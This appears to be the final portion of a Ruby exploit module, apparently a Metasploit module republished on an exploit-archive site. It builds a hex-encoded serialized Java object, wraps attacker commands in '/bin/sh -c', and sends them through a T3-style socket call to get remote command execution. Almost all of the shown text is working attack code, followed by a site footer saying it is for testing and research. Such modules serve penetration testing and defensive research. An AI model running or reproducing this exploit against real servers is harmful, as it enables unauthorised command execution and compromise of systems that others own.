request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
request_obj << '1d0181401281'
request_obj << '34bf427600093132372e'
request_obj << '302e312e31a53caff1'
request_obj << '000000000078'
new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
request_obj[0, 8] = new_len
sock.put([request_obj].pack('H*'))
sleep(1)
end
def format_payload(payload_cmd)
print_status('Formatting payload...')
payload_arr = payload_cmd.split(' ', 3)
formatted_payload = ''
payload_arr.each do |part|
formatted_payload << '74' # denotes a string
formatted_payload << part.length.to_s(16).rjust(4, '0')
formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
end
formatted_payload
end
def execute_command(cmd, _opts = {})
cmd.prepend('/bin/sh -c ')
cmd = build_payload_obj(cmd)
t3_send(cmd)
end
end
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum